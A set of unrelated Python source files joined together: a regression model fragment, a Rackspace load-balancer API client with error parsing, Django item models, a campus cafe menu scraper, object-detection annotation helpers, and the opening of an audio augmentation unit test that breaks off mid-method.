        # Bug fix: with multiple features the stored model is a weight
        # vector, so the prediction is the matrix-vector product X.w --
        # the previous elementwise ``self.model * data`` broadcast wrongly.
        return data.dot(self.model)
class LinearRegressionWithB(BaseModel):
    """
    Affine regression model class that uses the following model for predictions:
    .. math::
        y = \\omega*X + b
    """
    def fit(self, data: np.ndarray, labels: np.ndarray) -> None:
        """
        Fit the affine model by solving the normal equations on the design
        matrix [X | 1], storing :math:`(\\omega, b)` together in ``model``.
        :param data: input data for training
        :type data: np.ndarray
        :param labels: labels of the input data for training
        :type labels: np.ndarray
        :return: None
        """
        # Column-stack the features with a constant-one bias column.
        design = np.stack((data, np.ones(len(data))), axis=1)
        gram_inv = np.linalg.inv(design.T.dot(design))
        self.model = gram_inv.dot(design.T).dot(labels)
    def predict(self, data: np.ndarray) -> np.ndarray:
        """
        Predict :math:`y = \\omega*X + b` for every input point using the
        stored parameters.
        :param data: input data for testing
        :type data: np.ndarray
        :return: predicted data
        :rtype: np.ndarray
        """
        design = np.stack((data, np.ones(len(data))), axis=1)
        return design.dot(self.model)
|
from functools import partial
from operator import itemgetter
import attr
from characteristic import Attribute, attributes
from effect import catch, raise_
import six
from toolz.functoolz import identity
from toolz.itertoolz import concat
from otter.cloud_client import cloudfeeds as cf
from otter.cloud_client import (
log_success_response,
match_errors,
only_json_api_errors,
regex,
service_request)
from otter.constants import ServiceType
from otter.util.http import APIError, append_segments, try_json_with_keys
from otter.util.pure_http import has_code
# ----- CLB requests and error parsing -----
# Pre-built matchers for recognizing CLB API error messages.  Raw strings
# avoid the invalid/deprecated escape sequences ("\s", "\d", "\.") that the
# plain literals produced; the byte content is unchanged.
_CLB_IMMUTABLE_PATTERN = regex(
    r"Load\s*Balancer '\d+' has a status of '[^']+' and is considered "
    r"immutable")
_CLB_NOT_ACTIVE_PATTERN = regex(r"Load\s*Balancer is not ACTIVE")
_CLB_DELETED_PATTERN = regex(
    r"(Load\s*Balancer '\d+' has a status of 'PENDING_DELETE' and is|"
    r"The load balancer is deleted and) considered immutable")
_CLB_MARKED_DELETED_PATTERN = regex(
    r"The load\s*balancer is marked as deleted")
_CLB_NO_SUCH_NODE_PATTERN = regex(
    r"Node with id #\d+ not found for load\s*balancer #\d+$")
_CLB_NO_SUCH_LB_PATTERN = regex(
    r"Load\s*balancer not found")
_CLB_DUPLICATE_NODES_PATTERN = regex(
    r"Duplicate nodes detected. One or more nodes already configured "
    r"on load\s*balancer")
_CLB_NODE_LIMIT_PATTERN = regex(
    r"Nodes must not exceed (\d+) per load\s*balancer")
_CLB_NODE_REMOVED_PATTERN = regex(
    r"Node ids ((?:\d+,)*(?:\d+)) are not a part of your load\s*balancer")
_CLB_OVER_LIMIT_PATTERN = regex(r"OverLimit Retry\.{3}")
@attributes([Attribute('lb_id', instance_of=six.text_type)])
class CLBImmutableError(Exception):
    """
    Error to be raised when the CLB is in some status that causes it to be
    temporarily immutable.
    This exception is _not_ used when the status is PENDING_DELETE. See
    :obj:`CLBDeletedError`.

    :ivar lb_id: the affected load balancer's ID, as text.
    """
@attributes([Attribute('lb_id', instance_of=six.text_type)])
class CLBNotFoundError(Exception):
    """A CLB doesn't exist. Superclass of other, more specific exceptions.

    :ivar lb_id: the missing load balancer's ID, as text.
    """
class CLBDeletedError(CLBNotFoundError):
    """
    Error to be raised when the CLB has been deleted or is being deleted.
    This is distinct from it not existing.
    Inherits ``lb_id`` from :obj:`CLBNotFoundError`.
    """
class NoSuchCLBError(CLBNotFoundError):
    """
    Error to be raised when the CLB never existed in the first place (or it
    has been deleted so long that there is no longer a record of it).
    Inherits ``lb_id`` from :obj:`CLBNotFoundError`.
    """
@attributes([Attribute('lb_id', instance_of=six.text_type),
             Attribute('node_id', instance_of=six.text_type)])
class NoSuchCLBNodeError(Exception):
    """
    Error to be raised when attempting to modify a CLB node that no longer
    exists.

    :ivar lb_id: the load balancer's ID, as text.
    :ivar node_id: the missing node's ID, as text.
    """
@attributes([Attribute('lb_id', instance_of=six.text_type)])
class CLBNotActiveError(Exception):
    """
    Error to be raised when a CLB is not ACTIVE (and we have no more
    information about what its actual state is).

    :ivar lb_id: the affected load balancer's ID, as text.
    """
@attributes([Attribute('lb_id', instance_of=six.text_type)])
class CLBRateLimitError(Exception):
    """
    Error to be raised when CLB returns 413 (rate limiting).

    :ivar lb_id: the affected load balancer's ID, as text.
    """
@attributes([Attribute('lb_id', instance_of=six.text_type)])
class CLBDuplicateNodesError(Exception):
    """
    Error to be raised only when adding one or more nodes to a CLB whose
    address and port are mapped on the CLB.

    :ivar lb_id: the affected load balancer's ID, as text.
    """
@attributes([Attribute('lb_id', instance_of=six.text_type),
             Attribute("node_limit", instance_of=int)])
class CLBNodeLimitError(Exception):
    """
    Error to be raised only when adding one or more nodes to a CLB: adding
    that number of nodes would exceed the maximum number of nodes allowed on
    the CLB.

    :ivar lb_id: the affected load balancer's ID, as text.
    :ivar int node_limit: maximum nodes allowed, as reported by the API.
    """
@attr.s
class CLBPartialNodesRemoved(Exception):
    """
    Exception raised when only some of the nodes are removed.
    :ivar lb_id: CLB ID
    :type: :obj:`six.text_type`
    :ivar list not_removed_node_ids: List of node_ids not removed where each
        node_id is :obj:`six.text_type`
    :ivar list removed_node_ids: List of node_ids removed where each node_id
        is :obj:`six.text_type`
    """
    # Attribute order matters: it defines the positional-argument order of
    # the attrs-generated __init__ (see remove_clb_nodes).
    lb_id = attr.ib(validator=attr.validators.instance_of(six.text_type))
    not_removed_node_ids = attr.ib(validator=attr.validators.instance_of(list))
    removed_node_ids = attr.ib(validator=attr.validators.instance_of(list))
def _expand_clb_matches(matches_tuples, lb_id, node_id=None):
    """
    Expand ``(code, pattern, exc_type)`` tuples into the 4-tuple form used by
    ``match_errors``: ``(code, ("message",), pattern, exc_factory)``, where
    the factory is the exception type partially applied with the load
    balancer ID (and the node ID, when one is given).
    """
    exc_kwargs = {"lb_id": six.text_type(lb_id)}
    if node_id is not None:
        exc_kwargs["node_id"] = six.text_type(node_id)
    expanded = []
    for code, pattern, exc_type in matches_tuples:
        expanded.append(
            (code, ("message",), pattern, partial(exc_type, **exc_kwargs)))
    return expanded
def _process_clb_api_error(api_error_code, json_body, lb_id):
    """
    Attempt to parse generic CLB API error messages, and raise recognized
    exceptions in their place.
    :param int api_error_code: The status code from the HTTP request
    :param dict json_body: The error message, parsed as a JSON dict.
    :param string lb_id: The load balancer ID
    :raises: :class:`CLBImmutableError`, :class:`CLBDeletedError`,
        :class:`NoSuchCLBError`, :class:`APIError` by itself
    """
    mappings = (
        # overLimit is different than the other CLB messages because it's
        # produced by repose
        [(413, ("overLimit", "message"), _CLB_OVER_LIMIT_PATTERN,
          partial(CLBRateLimitError, lb_id=six.text_type(lb_id)))] +
        # Remaining mappings share the plain ("message",) key path.
        _expand_clb_matches(
            [(422, _CLB_DELETED_PATTERN, CLBDeletedError),
             (410, _CLB_MARKED_DELETED_PATTERN, CLBDeletedError),
             (422, _CLB_IMMUTABLE_PATTERN, CLBImmutableError),
             (422, _CLB_NOT_ACTIVE_PATTERN, CLBNotActiveError),
             (404, _CLB_NO_SUCH_LB_PATTERN, NoSuchCLBError)],
            lb_id))
    return match_errors(mappings, api_error_code, json_body)
def add_clb_nodes(lb_id, nodes):
    """
    Generate effect to add one or more nodes to a load balancer.
    Note: This is not correctly documented in the load balancer documentation -
    it is documented as "Add Node" (singular), but the examples show multiple
    nodes being added.
    :param str lb_id: The load balancer ID to add the nodes to
    :param list nodes: A list of node dictionaries that each look like::
        {
            "address": "valid ip address",
            "port": 80,
            "condition": "ENABLED",
            "weight": 1,
            "type": "PRIMARY"
        }
        (weight and type are optional)
    :return: :class:`ServiceRequest` effect
    :raises: :class:`CLBImmutableError`, :class:`CLBDeletedError`,
        :class:`NoSuchCLBError`, :class:`CLBDuplicateNodesError`,
        :class:`APIError`
    """
    eff = service_request(
        ServiceType.CLOUD_LOAD_BALANCERS,
        'POST',
        append_segments('loadbalancers', lb_id, 'nodes'),
        data={'nodes': nodes},
        success_pred=has_code(202))
    @only_json_api_errors
    def _parse_known_errors(code, json_body):
        # Try the add-specific error (duplicate nodes) first, then the
        # generic CLB errors, then the node-limit 413 case.
        mappings = _expand_clb_matches(
            [(422, _CLB_DUPLICATE_NODES_PATTERN, CLBDuplicateNodesError)],
            lb_id)
        match_errors(mappings, code, json_body)
        _process_clb_api_error(code, json_body, lb_id)
        process_nodelimit_error(code, json_body, lb_id)
    return eff.on(error=_parse_known_errors).on(
        log_success_response('request-add-clb-nodes', identity))
def process_nodelimit_error(code, json_body, lb_id):
    """
    Parse error that causes CLBNodeLimitError along with limit and raise it

    :param int code: HTTP status code; only 413 responses are examined.
    :param dict json_body: parsed JSON error body whose "message" is matched
        against :data:`_CLB_NODE_LIMIT_PATTERN`.
    :param lb_id: load balancer ID used when constructing the error.
    :raises: :class:`CLBNodeLimitError` when the message reports the limit.
    """
    if code != 413:
        return
    match = _CLB_NODE_LIMIT_PATTERN.match(json_body.get("message", ""))
    if match is not None:
        # Group 1 captures the numeric per-CLB node limit.
        limit = int(match.group(1))
        raise CLBNodeLimitError(lb_id=six.text_type(lb_id), node_limit=limit)
def change_clb_node(lb_id, node_id, condition, weight, _type="PRIMARY"):
    """
    Generate effect to change a node on a load balancer.
    :param str lb_id: The load balancer ID to add the nodes to
    :param str node_id: The node id to change.
    :param str condition: The condition to change to: one of "ENABLED",
        "DRAINING", or "DISABLED"
    :param int weight: The weight to change to.
    :param str _type: The type to change the CLB node to.
    :return: :class:`ServiceRequest` effect
    :raises: :class:`CLBImmutableError`, :class:`CLBDeletedError`,
        :class:`NoSuchCLBError`, :class:`NoSuchCLBNodeError`, :class:`APIError`
    """
    eff = service_request(
        ServiceType.CLOUD_LOAD_BALANCERS,
        'PUT',
        append_segments('loadbalancers', lb_id, 'nodes', node_id),
        data={'node': {
            'condition': condition, 'weight': weight, 'type': _type}},
        success_pred=has_code(202))
    @only_json_api_errors
    def _parse_known_errors(code, json_body):
        # Generic CLB errors first, then the node-specific 404.
        _process_clb_api_error(code, json_body, lb_id)
        match_errors(
            _expand_clb_matches(
                [(404, _CLB_NO_SUCH_NODE_PATTERN, NoSuchCLBNodeError)],
                lb_id=lb_id, node_id=node_id),
            code,
            json_body)
    return eff.on(error=_parse_known_errors)
    # CLB 202 response here has no body, so no response logging needed
# Number of nodes that can be deleted in `DELETE ../nodes` call as per
# https://developer.rackspace.com/docs/cloud-load-balancers/v1/api-reference/nodes/#bulk-delete-nodes
# remove_clb_nodes() truncates larger requests to this many IDs per call.
CLB_BATCH_DELETE_LIMIT = 10
def remove_clb_nodes(lb_id, node_ids):
    """
    Remove multiple nodes from a load balancer.
    :param str lb_id: A load balancer ID.
    :param node_ids: iterable of node IDs.
    :return: Effect of None.
    Succeeds on 202.
    This function will handle the case where *some* of the nodes are valid and
    some aren't, by retrying deleting only the valid ones.
    """
    node_ids = list(node_ids)
    # Renamed from ``partial`` so this local does not shadow
    # ``functools.partial``, which is imported and used at module scope.
    partial_removal = None
    if len(node_ids) > CLB_BATCH_DELETE_LIMIT:
        # The API caps bulk deletes; only the first batch is removed now and
        # the remainder is reported via CLBPartialNodesRemoved on success.
        not_removing = node_ids[CLB_BATCH_DELETE_LIMIT:]
        node_ids = node_ids[:CLB_BATCH_DELETE_LIMIT]
        partial_removal = CLBPartialNodesRemoved(six.text_type(lb_id),
                                                 map(six.text_type, not_removing),
                                                 map(six.text_type, node_ids))
    eff = service_request(
        ServiceType.CLOUD_LOAD_BALANCERS,
        'DELETE',
        append_segments('loadbalancers', lb_id, 'nodes'),
        params={'id': map(str, node_ids)},
        success_pred=has_code(202))
    def check_invalid_nodes(exc_info):
        code = exc_info[1].code
        body = exc_info[1].body
        if code == 400:
            message = try_json_with_keys(
                body, ["validationErrors", "messages", 0])
            if message is not None:
                match = _CLB_NODE_REMOVED_PATTERN.match(message)
                if match:
                    # Some node IDs were already gone: retry with only the
                    # still-present ones.
                    removed = concat([group.split(',')
                                      for group in match.groups()])
                    return remove_clb_nodes(lb_id,
                                            set(node_ids) - set(removed))
        six.reraise(*exc_info)
    return eff.on(
        error=catch(APIError, check_invalid_nodes)
    ).on(
        error=only_json_api_errors(
            lambda c, b: _process_clb_api_error(c, b, lb_id))
    ).on(success=lambda _: None if partial_removal is None
         else raise_(partial_removal))
    # CLB 202 responses here has no body, so no response logging needed.
def get_clb_nodes(lb_id):
    """
    Fetch the nodes of the given load balancer. Returns list of node JSON.

    NOTE(review): the ``lambda (response, body):`` tuple-parameter syntax is
    Python 2 only; this module cannot run unmodified on Python 3.
    """
    return service_request(
        ServiceType.CLOUD_LOAD_BALANCERS,
        'GET',
        append_segments('loadbalancers', str(lb_id), 'nodes'),
    ).on(
        error=only_json_api_errors(
            lambda c, b: _process_clb_api_error(c, b, lb_id))
    ).on(
        log_success_response('request-list-clb-nodes', identity)
    ).on(
        success=lambda (response, body): body['nodes'])
def get_clbs():
    """Fetch all LBs for a tenant. Returns list of loadbalancer JSON.

    NOTE(review): uses Python 2-only tuple-parameter lambda syntax.
    """
    return service_request(
        ServiceType.CLOUD_LOAD_BALANCERS, 'GET', 'loadbalancers',
    ).on(
        log_success_response('request-list-clbs', identity)
    ).on(
        success=lambda (response, body): body['loadBalancers'])
def get_clb_node_feed(lb_id, node_id):
    """
    Get the atom feed associated with a CLB node.
    :param int lb_id: Cloud Load balancer ID
    :param int node_id: Node ID of in loadbalancer node
    :returns: Effect of ``list`` of atom entry :class:`Element`
    :rtype: ``Effect``
    """
    return cf.read_entries(
        ServiceType.CLOUD_LOAD_BALANCERS,
        append_segments('loadbalancers', str(lb_id), 'nodes',
                        '{}.atom'.format(node_id)),
        {},
        cf.Direction.NEXT,
        "request-get-clb-node-feed"
    # read_entries yields a tuple; keep only its first element (the entries).
    ).on(itemgetter(0)).on(
        error=only_json_api_errors(
            lambda c, b: _process_clb_api_error(c, b, lb_id))
    )
def get_clb_health_monitor(lb_id):
    """
    Return CLB health monitor setting
    :param int lb_id: Loadbalancer ID
    :return: ``Effect`` of ``dict`` representing health monitor config

    NOTE(review): uses Python 2-only tuple-parameter lambda syntax.
    """
    return service_request(
        ServiceType.CLOUD_LOAD_BALANCERS,
        'GET',
        append_segments('loadbalancers', str(lb_id), 'healthmonitor')
    ).on(
        error=only_json_api_errors(
            lambda c, b: _process_clb_api_error(c, b, lb_id))
    ).on(
        log_success_response('request-get-clb-healthmon', identity)
    ).on(
        success=lambda (response, body): body["healthMonitor"])
|
<gh_stars>0
try:
from collections import OrderedDict
except ImportError:
from django.utils.datastructures import SortedDict as OrderedDict
from django.db import models
from django.db.models.fields import BLANK_CHOICE_DASH
from django.utils.encoding import python_2_unicode_compatible
from django.utils.functional import lazy
from django.utils.translation import ugettext_lazy as _
from . import settings, utils
try:
from django.utils.text import slugify
except ImportError: # pragma: no cover, Django 1.4
from django.template.defaultfilters import slugify
@python_2_unicode_compatible
class Item(models.Model):
    """A listable item whose extra fields are modeled dynamically via
    :class:`Attribute`/:class:`AttributeValue` (related name 'attributes')."""
    title = models.CharField(_('title'), max_length=100)
    short_description = models.TextField(
        _('short description'), blank=True, null=True)
    image = models.ForeignKey('media.Image', blank=True, null=True)
    url = models.URLField(blank=True, null=True)
    # Free-text price (allows currency symbols/ranges); not sortable numerically.
    price = models.CharField(_('price'), blank=True, null=True, max_length=100)
    sold = models.BooleanField(_('sold'), default=False)
    featured = models.BooleanField(_('featured'), default=False)
    @property
    def get_attributes(self):
        # Attribute values ordered by their Attribute definition's ordering.
        return self.attributes.order_by('attribute__ordering')
    class Meta:
        verbose_name = _('item')
        verbose_name_plural = _('items')
    def __str__(self):
        return self.title
# Resolved once at import time; a sequence of tuples where index 0 is the
# type key, index 1 its label, and index 2 the form-field factory (see
# Attribute.get_type / get_type_choices below).
FIELD_TYPES = utils.get_object(settings.LEONARDO_ITEMS_FIELD_TYPES)
def get_type_choices():
    """Return (key, label) pairs for the type field, re-resolving the
    setting lazily so overrides after import are honored."""
    return [r[:2] for r in
            utils.get_object(settings.LEONARDO_ITEMS_FIELD_TYPES)]
@python_2_unicode_compatible
class Attribute(models.Model):
    """Definition of one dynamic item field (type, choices, help text).

    NOTE(review): ``get_choices`` and ``formfield`` reference
    ``self.is_required``, but no such field is declared on this model --
    presumably added elsewhere (subclass/migration); TODO confirm.
    """
    ordering = models.IntegerField(_('ordering'), default=0)
    title = models.CharField(_('title'), max_length=100)
    name = models.CharField(_('name'), max_length=100)
    type = models.CharField(
        _('type'), max_length=20, choices=lazy(get_type_choices, list)())
    choices = models.CharField(
        _('choices'), max_length=1024, blank=True,
        help_text=_('Comma-separated'))
    help_text = models.CharField(
        _('help text'), max_length=1024, blank=True,
        help_text=_('Optional extra explanatory text beside the field'))
    default_value = models.CharField(
        _('default value'), max_length=255, blank=True,
        help_text=_('Optional default value of the field'))
    class Meta:
        ordering = ['ordering', 'id']
        verbose_name = _('item attribute')
        verbose_name_plural = _('item attributes')
    def __str__(self):
        return self.title
    def get_choices(self):
        """Return (slug, label) choice tuples parsed from the CSV field,
        prefixed with the blank dash for optional selects."""
        get_tuple = lambda value: (slugify(value.strip()), value.strip())
        choices = [get_tuple(value) for value in self.choices.split(',')]
        if not self.is_required and self.type == 'select':
            choices = BLANK_CHOICE_DASH + choices
        return tuple(choices)
    def get_type(self, **kwargs):
        """Instantiate this attribute's form field via the FIELD_TYPES
        factory registered for ``self.type``."""
        types = dict((r[0], r[2]) for r in FIELD_TYPES)
        return types[self.type](**kwargs)
    def add_formfield(self, fields, form):
        """Insert this attribute's form field into ``fields`` keyed by the
        slugified attribute name. ``form`` is currently unused."""
        fields[slugify(self.name)] = self.formfield()
    def formfield(self):
        """Build the configured form field (label, required, initial,
        choices, help text) for this attribute."""
        kwargs = dict(
            label=self.title,
            required=self.is_required,
            initial=self.default_value,
        )
        if self.choices:
            kwargs['choices'] = self.get_choices()
        if self.help_text:
            kwargs['help_text'] = self.help_text
        return self.get_type(**kwargs)
class AttributeValue(models.Model):
    """Stored value of one Attribute for one Item; unique per pair.

    NOTE(review): the ``attribute`` FK's verbose_name is _('item') -- looks
    like a copy-paste slip (should presumably be _('attribute')); also
    verbose_name_plural reads 'attribute value' (singular). Flagged only,
    not changed here.
    """
    item = models.ForeignKey(
        Item, related_name='attributes', verbose_name=_('item'))
    attribute = models.ForeignKey(
        Attribute, related_name='values', verbose_name=_('item'))
    value = models.CharField(
        _('value'), max_length=255, blank=True,
        help_text=_('value of the field'))
    class Meta:
        unique_together = (('item', 'attribute'),)
        verbose_name = _('attribute value')
        verbose_name_plural = _('attribute value')
|
#!/usr/bin/env python
# coding: utf-8
#
# Copyright (c) 2015, PAL Team.
# All rights reserved. See LICENSE for details.
#
# An API to the Bon Appetit food service data
#
# Author: <NAME> and <NAME>
# TODO:
# - Add support for caching data with pickle
# - Decide on a naming scheme for cached data
# - Implement a way to clear the cache as it becomes irrelevant
# - Add a CI job to cache data every morning/evening
import json
import re
import requests
from api import DataNotAvailableException
from utils import filter_dict_by_keys
# Constants for scraping the cafe pages
CAFE_NAMES = ['burton', 'east-hall', 'sayles-hill-cafe', 'weitz-cafe']
_CAFE_URL = 'http://carleton.cafebonappetit.com/cafe/{cafe_name}/{date}/'
# Patterns pull JS literals assigned to Bamco.* variables out of the page.
_RE_NAME = r'Bamco.current_cafe\s+=\s+(?:[^;]+)name:\s+\'(.*?)\'(?:[^;]+);'
_RE_MENU = r'Bamco.menu_items\s+=\s+([^;]+);'
_RE_DAYPARTS = r'Bamco.dayparts\[\'(\d+)\'\]\s+=\s+([^;]+);'
# Constants for parsing Bamco.menu_items
_BASE_FIELDS = [u'id', u'label']
_MENU_FIELDS = _BASE_FIELDS + [u'description', u'cor_icon']
# (pattern, replacement) pairs applied to menu text: strip "(G)"-style
# dietary tags, then collapse runs of whitespace.
_MENU_REPLACEMENTS = (
    (re.compile(r' (\([^G]?G?\))'), ""),
    (re.compile(r'\s+'), " ")
)
_MEAL_FIELDS = _BASE_FIELDS + [u'stations', u'time_formatted']
_MEAL_STATION_FIELDS = _BASE_FIELDS + [u'items']
def _get_page_for_cafe(cafe_name, date_):
    """Fetch and return the raw HTML for *cafe_name* on the given date."""
    cafe_url = _CAFE_URL.format(cafe_name=cafe_name, date=date_.isoformat())
    return requests.get(cafe_url, timeout=5.0).text
def _get_raw_data_from_page(page):
    """Scrape the cafe name, menu dict, and dayparts dict out of *page*.

    Any piece that cannot be found comes back as None.
    """
    found_names = re.findall(_RE_NAME, page)
    cafe_name = found_names[0] if found_names else None

    found_menus = re.findall(_RE_MENU, page)
    dishes = json.loads(found_menus[0]) if found_menus else None

    found_dayparts = re.findall(_RE_DAYPARTS, page)
    if found_dayparts:
        dayparts = {int(part_num): json.loads(blob)
                    for part_num, blob in found_dayparts}
    else:
        dayparts = None
    return cafe_name, dishes, dayparts
def _get_raw_data_for_cafe(cafe_name, day):
    """Fetch the cafe page for *day* and scrape (name, dishes, dayparts)."""
    return _get_raw_data_from_page(_get_page_for_cafe(cafe_name, day))
def _clean_menu(menu):
    """ Returns a cleaned version of the given menu info for dishes.

    Mutates *menu* in place (entries are replaced with filtered copies) and
    returns it; a falsy input yields None.  Assumes every entry carries
    u'description' and u'label' keys -- a missing key would raise KeyError;
    TODO confirm against the scraped data.
    """
    if not menu:
        return None
    for food_id in menu:
        # Keep only the whitelisted fields, then normalize the text.
        info = filter_dict_by_keys(menu[food_id], _MENU_FIELDS)
        for regex, new in _MENU_REPLACEMENTS:
            info[u'description'] = regex.sub(new, info[u'description'])
            info[u'label'] = regex.sub(new, info[u'label'])
        menu[food_id] = info
    return menu
def _clean_meals_and_merge_dishes(dayparts, dishes):
    """ Takes in the cleaned menu and messy dayparts, cleans the dayparts then
    merges the dishes into the right stations in the meals.

    Returns the reshaped dayparts keyed by meal label; a falsy input is
    returned unchanged.  NOTE: ``unicode`` makes this Python 2 only.
    """
    if not dayparts:
        return dayparts
    dayparts = _use_labels_as_keys(dayparts)
    for meal_name in dayparts:
        info = filter_dict_by_keys(dayparts[meal_name], _MEAL_FIELDS)
        meal_stations = _use_labels_as_keys(info[u'stations'])
        for stat_name in meal_stations:
            stat_info = filter_dict_by_keys(meal_stations[stat_name],
                                            _MEAL_STATION_FIELDS)
            if u'items' in stat_info:
                # Put all the dishes served at this station into the dict
                # (entries that aren't string IDs are silently dropped).
                items = stat_info[u'items']
                stat_info[u'items'] = [dishes[eid]
                                       for eid in items
                                       if type(eid) == unicode]
            meal_stations[stat_name] = stat_info
        info[u'stations'] = meal_stations
        dayparts[meal_name] = info
    return dayparts
def get_meals_for_cafe(cafe_name, date_):
    """Return the cleaned meal listing for *cafe_name* on *date_*.

    :raises DataNotAvailableException: when the page lacks either the menu
        or the dayparts data.
    """
    raw_page = _get_page_for_cafe(cafe_name, date_)
    _, raw_menu, raw_dayparts = _get_raw_data_from_page(raw_page)
    if raw_menu is None or raw_dayparts is None:
        raise DataNotAvailableException(
            "Data was not available for {} on {}".format(cafe_name,
                                                         date_.weekday()))
    cleaned_dishes = _clean_menu(raw_menu)
    return _clean_meals_and_merge_dishes(raw_dayparts, cleaned_dishes)
def _use_labels_as_keys(collection):
""" Given a list or dict of items, returns a dict
with each item's 'label' value as the item's key.
"""
if type(collection) == dict:
return {all_info.pop(u'label'): all_info
for (old_id, all_info) in collection.iteritems()}
elif type(collection) == list:
return {all_info.pop(u'label'): all_info
for all_info in collection}
if __name__ == '__main__':
    from datetime import date
    # print(...) call form behaves identically on Python 2 and 3, whereas
    # the bare print statement is a SyntaxError on Python 3.
    print(get_meals_for_cafe('burton', date.today()))
|
import os
import xml.etree.ElementTree as ET
import matplotlib.font_manager as fm
import numpy as np
from PIL import ImageDraw, ImageFont
def get_label(path):
    """Read a whitespace-separated text file and return the last token of
    every line (the label column)."""
    with open(path, encoding='UTF-8') as f:
        return [line.strip().split()[-1] for line in f.readlines()]
def parse_rec(filename):
    """Parse a VOC-style annotation xml file.

    Returns (annots, image_width, image_height) where annots is a list of
    dicts with keys: name, pose, truncated, difficult, and bbox as
    [xmin, ymin, xmax, ymax] ints.
    """
    root = ET.parse(filename).getroot()
    size_tag = root.find('size')
    image_width = int(size_tag.find('width').text)
    image_height = int(size_tag.find('height').text)
    annots = []
    for obj in root.findall('object'):
        bndbox = obj.find('bndbox')
        annots.append({
            'name': obj.find('name').text,
            'pose': obj.find('pose').text,
            'truncated': int(obj.find('truncated').text),
            'difficult': int(obj.find('difficult').text),
            'bbox': [int(bndbox.find(tag).text)
                     for tag in ('xmin', 'ymin', 'xmax', 'ymax')],
        })
    return annots, image_width, image_height
def get_img_annotations(img_list, annotations_dir, standard='dog', single_dog=False):
    """Collect bounding boxes for every image flagged '1' in *img_list*.

    Each line of *img_list* is "<image_id> <flag> ...". Only objects whose
    name equals *standard* are kept; with single_dog=True, images holding
    more than one matching box are skipped entirely.
    """
    annotation = []
    with open(img_list) as f:
        lines = f.readlines()
    for line in lines:
        fields = line.strip().split()
        if fields[1] != '1':
            continue
        xml_path = os.path.join(annotations_dir, fields[0] + '.xml')
        recs, width, height = parse_rec(xml_path)
        matching = [r for r in recs if r['name'] == standard]
        boxes = [r['bbox'] for r in matching]
        labels = [r['name'] for r in matching]
        if single_dog and len(boxes) > 1:
            continue
        annotation.append({'fname': fields[0] + '.jpg',
                           'annots': {'w': width, 'h': height,
                                      'boxes': boxes, 'labels': labels}})
    return annotation
def draw(fname, img, dets, scores, save=None):
    """Draw detection boxes and rounded scores onto *img*.

    dets/scores are array-likes exposing .tolist(). When *save* is given,
    the image is written into that directory under the basename of *fname*.
    """
    canvas = ImageDraw.Draw(img)
    font = ImageFont.truetype(
        fm.findfont(fm.FontProperties(family='DejaVu Sans')), size=24)
    if len(dets):
        for box, score in zip(dets.tolist(), scores.tolist()):
            canvas.rectangle(box, outline='blue', width=2)
            canvas.text((box[0], box[1]), str(round(score, 2)),
                        fill=(0, 255, 0), font=font)
    if save is not None:
        if not os.path.exists(save):
            os.makedirs(save)
        img.save(os.path.join(save, fname.split('/')[-1]))
def get_scale(params, base_size=130):
    """Build a geometric series of image scales.

    Scales run from base_size/params.max_size up to base_size/params.min_size
    in params.scale_num geometrically spaced steps.

    Args:
        params: object with min_size, max_size and scale_num attributes.
        base_size: reference size divided by min/max size (default 130,
            the value that was previously hard-coded).

    Returns:
        list of params.scale_num floats in increasing order.
    """
    max_scale = base_size / params.min_size
    min_scale = base_size / params.max_size
    factor = np.power(max_scale / min_scale, 1 / (params.scale_num - 1))
    return [min_scale * np.power(factor, i) for i in range(params.scale_num)]
def get_dog_gt(anno, name='dog'):
    """Return the bbox of every annotation whose class matches *name*.

    Args:
        anno: iterable of dicts with 'name' and 'bbox' keys (parse_rec output).
        name: class name to keep (default 'dog', the previously hard-coded value).

    Returns:
        list of bbox lists, in input order.
    """
    return [an['bbox'] for an in anno if an['name'] == name]
def data2coco(data, file, voc_categories):
    """Convert the internal annotation format to a COCO-style dict.

    Args:
        data: list of {'fname': ..., 'annots': {'w', 'h', 'boxes', 'labels',
            and for detections 'scores'}} entries; the filename stem must be
            numeric (e.g. '000123.jpg') since it becomes the image id.
        file: 'Dt' marks detection results, adding a 'score' per annotation;
            any other value is treated as ground truth.
        voc_categories: mapping of category name -> integer category id.

    Returns:
        dict with COCO 'images', 'annotations' and 'categories' sections.
    """
    json_dict = {"images": [], "type": "instances", "annotations": [],
                 "categories": []}
    bnd_id = 1  # running annotation id, unique across all images
    for d in data:
        filename = d['fname']
        image_id = int(os.path.splitext(filename)[0])
        width = d['annots']['w']
        height = d['annots']['h']
        json_dict['images'].append({'file_name': filename, 'height': height,
                                    'width': width, 'id': image_id})
        # enumerate replaces the previous manual i = 0 / i += 1 counter
        for i, (box, label) in enumerate(zip(d['annots']['boxes'],
                                             d['annots']['labels'])):
            xmin, ymin, xmax, ymax = box
            o_width = abs(xmax - xmin)
            o_height = abs(ymax - ymin)
            ann = {'area': o_width * o_height, 'iscrowd': 0,
                   'image_id': image_id,
                   'bbox': [xmin, ymin, o_width, o_height],
                   'category_id': voc_categories[label], 'id': bnd_id,
                   'ignore': 0, 'segmentation': []}
            if file == 'Dt':
                ann['score'] = d['annots']['scores'][i]
            json_dict['annotations'].append(ann)
            bnd_id += 1
    for cate, cid in voc_categories.items():
        json_dict['categories'].append(
            {'supercategory': 'none', 'id': cid, 'name': cate})
    return json_dict
|
import json
import math
import unittest
import numpy as np
import random
from audiomentations.core.utils import calculate_rms
from audiomentations import AddGaussianSNR
class TestGaussianSNR(unittest.TestCase):
    """Tests for AddGaussianSNR covering both the legacy ratio parameters
    (min_SNR/max_SNR, which emit a deprecation UserWarning when used) and
    the newer dB-based parameters (min_snr_in_db/max_snr_in_db), plus
    parameter serialization and multichannel input.
    """

    def test_gaussian_noise_snr_defaults(self):
        # The default constructor still relies on legacy parameters, so
        # applying the transform is expected to warn.
        np.random.seed(42)
        samples_in = np.random.normal(0, 1, size=1024).astype(np.float32)
        augmenter = AddGaussianSNR(p=1.0)
        std_in = np.mean(np.abs(samples_in))
        with self.assertWarns(UserWarning):
            samples_out = augmenter(samples=samples_in, sample_rate=16000)
        std_out = np.mean(np.abs(samples_out))
        self.assertEqual(samples_out.dtype, np.float32)
        self.assertNotAlmostEqual(float(std_out), 0.0)
        # Added noise should increase the mean absolute amplitude.
        self.assertGreater(std_out, std_in)

    def test_gaussian_noise_snr_legacy_positional_parameter(self):
        # Legacy positional (min_SNR, max_SNR) arguments still work but warn.
        np.random.seed(42)
        samples_in = np.random.normal(0, 1, size=1024).astype(np.float32)
        augmenter = AddGaussianSNR(0.001, 1.0, p=1.0)
        std_in = np.mean(np.abs(samples_in))
        with self.assertWarns(UserWarning):
